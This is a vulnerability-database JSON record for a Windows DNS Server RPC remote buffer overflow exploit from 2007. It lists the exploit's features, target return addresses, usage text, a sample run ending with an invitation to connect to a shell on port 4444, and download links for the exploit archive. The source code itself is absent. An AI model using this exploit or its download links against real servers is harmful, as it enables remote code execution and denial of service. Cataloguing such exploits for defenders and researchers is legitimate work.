{"href": "https://www.seebug.org/vuldb/ssvid-64631", "status": "poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2)", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-64631", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2014-07-01T00:00:00", "sourceData": "\n Exploit v2 features:\r\n - Target Remote port 445 (by default but requires auth)\r\n - Manual target for dynamic tcp port (without auth)\r\n - Automatic search for dynamic dns rpc port\r\n - Local and remote OS fingerprinting (auto target)\r\n - Windows 2000 server and Windows 2003 server (Spanish) supported by default\r\n - Fixed bug with Windows 2003 Shellcode\r\n - Universal local exploit for Win2k (automatic search for opcodes)\r\n - Universal local and remote exploit for Win2k3 (/GS bypassed only with DEP disabled)\r\n - Added targets for remote win2k English and italian (not tested, found with metasploit opcode database. please report your owns)\r\n - Microsoft RPC api used ( who cares? 
:p )\r\n\r\n\r\nD:\\Programaci\u00f3n\\DNSTEST>dnstest\r\n --------------------------------------------------------------\r\n Microsoft Dns Server local & remote RPC Exploit code\r\n Exploit code by Andres Tarasco & Mario Ballano\r\n Tested against Windows 2000 server SP4 and Windows 2003 SP2\r\n --------------------------------------------------------------\r\n\r\n Usage: dnstest -h 127.0.0.1 (Universal local exploit)\r\n dnstest -h host [-t id] [-p port]\r\n Targets:\r\n 0 (0x30270b0b) - Win2k3 server SP2 Universal - (default for win2k3)\r\n 1 (0x79467ef8) - Win2k server SP4 Spanish - (default for win2k )\r\n 2 (0x7c4fedbb) - Win2k server SP4 English\r\n 3 (0x7963edbb) - Win2k server SP4 Italian\r\n 4 (0x41414141) - Windows all Denial of Service\r\n\r\n\r\nD:\\Programaci\u00f3n\\DNSTEST>dnstest.exe -h 192.168.1.2\r\n --------------------------------------------------------------\r\n Microsoft Dns Server local & remote RPC Exploit code\r\n Exploit code by Andres Tarasco & Mario Ballano\r\n Tested against Windows 2000 server SP4 and Windows 2003 SP2\r\n --------------------------------------------------------------\r\n\r\n[+] Trying to fingerprint target.. (05.02)\r\n[+] Remote Host identified as Windows 2003\r\n[-] No port selected. 
Trying Ninja sk1llz\r\n[+] Binding to ncacn_ip_tcp: 192.168.1.2\r\n[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0\r\n[+] RPC binding string: ncacn_ip_tcp:192.168.1.2[1105]\r\n[+] Dynamic DNS rpc port found (1105)\r\n[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.2[1105]\r\n[+] RpcBindingFromStringBinding success\r\n[+] Sending Exploit code to DnssrvOperation()\r\n[+] Now try to connect to port 4444\r\n\r\n\r\nalso available at\r\n\r\nhttp://514.es/Microsoft_Dns_Server_Exploit_v2.1.zip\r\nhttp://www.48bits.com/exploits/dnsxpl.v2.1.zip \r\nhttp://www.exploit-db.com/sploits/04172007-dnsxpl.v2.1.zip\r\n\r\n# milw0rm.com [2007-04-18]\r\n\n ", "id": "SSV:64631", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T15:18:10", "reporter": "Root", "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645442199}}